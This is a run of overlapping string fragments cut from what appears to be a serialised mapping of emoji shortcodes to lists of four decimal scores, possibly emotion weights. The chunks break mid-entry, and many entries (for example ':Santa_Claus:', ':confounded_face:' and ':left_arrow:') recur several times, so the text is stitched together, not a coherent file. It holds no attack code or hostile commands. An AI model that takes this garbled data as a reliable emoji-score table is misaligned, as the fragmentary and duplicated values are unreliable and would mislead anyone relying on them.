[0.147, 0.11699999999999999, 0.152, 0.10800000000000001],", "0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27,", "0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171,", "\":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375,", "[0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271,", "\":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131,", "0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\":", "0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196,", "[0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155,", "\":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17,", "0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214,", "0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244,", "0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282],", "0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\":", "\":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002,", "0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226],", "\":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998,", "0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305,", "\":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284,", "0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\":", "0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3,", "0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998],", "0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\":", "0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111],", "0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134],", "0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\":", "[0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017,", "\":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08,", "[0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001,", "[0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125,", "0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21,", "0.392], \":Scorpio:\": [0.185, 0.218, 0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282,", "0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996,", "0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175],", "[0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105,", "0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282],", "0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27],", "0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149,", "[0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997,", "[0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302,", "[0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222,", "[0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005,", "\":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16,", "0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\":", "0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\":", "0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166],", "0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162],", "\":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196,", "0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\":", "[0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282,", "0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25],", "0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998,", "0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327],", "0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307],", "0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275],", "[0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09,", "0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\":", "[0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147,", "[0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345,", "[0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068,", "\":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192,", "\":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172,", "\":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179,", "0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\":", "\":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096,", "[0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03,", "\":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126,", "0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08],", "0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\":", "0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257,", "\":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239,", "0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051,", "0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\":", "\":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081,", "0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205],", "0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261],", "0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228],", "0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191, 0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19,", "0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098,", "0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25],", "0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406],", "0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19],", "0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111],", "0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\":", "\":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313,", "0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2],", "\":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247,", "0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\":", "[0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15,", "0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138],", "0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075,", "0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\":", "0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156,", "0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102],", "0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162],", "[0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179,", "[0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001, 0.129], \":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31,", "0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\":", "0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196],", "0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997],", "0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065,", "0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001,", "0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086],", "0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998,", "\":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165,", "\":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998,", "0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\":", "0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999],", "0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\":", "\":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265,", "0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282],", "\":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002,", "[0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382,", "0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242],", "0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327],", "\":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162,", "0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361,", "0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001,", "0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\":", "0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\":", "\":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138,", "\":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198,", "0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\": [0.171, 0.263, 0.128, 0.212], \":sushi:\":", "\":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262,", "\":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252,", "0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284],", "[0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998,", "[0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233,", "\":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126,", "[0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23,", "[0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391,", "0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\":", "0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185],", "0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001,", "\":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34,", "0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\":", "0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\":", "0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\":", "0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\":", "0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\":", "0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299],", "\":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28,", "\":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998,", "0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18,", "0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242,", "0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228],", "\":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299,", "[0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091,", "0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\":", "[0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125,", "\":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132,", "0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205,", "[0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999,", "[0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998,", "0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\":", "0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213,", "0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28],", "0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212,", "\":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157,", "\":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218,", "[0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262,", "\":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053,", "0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 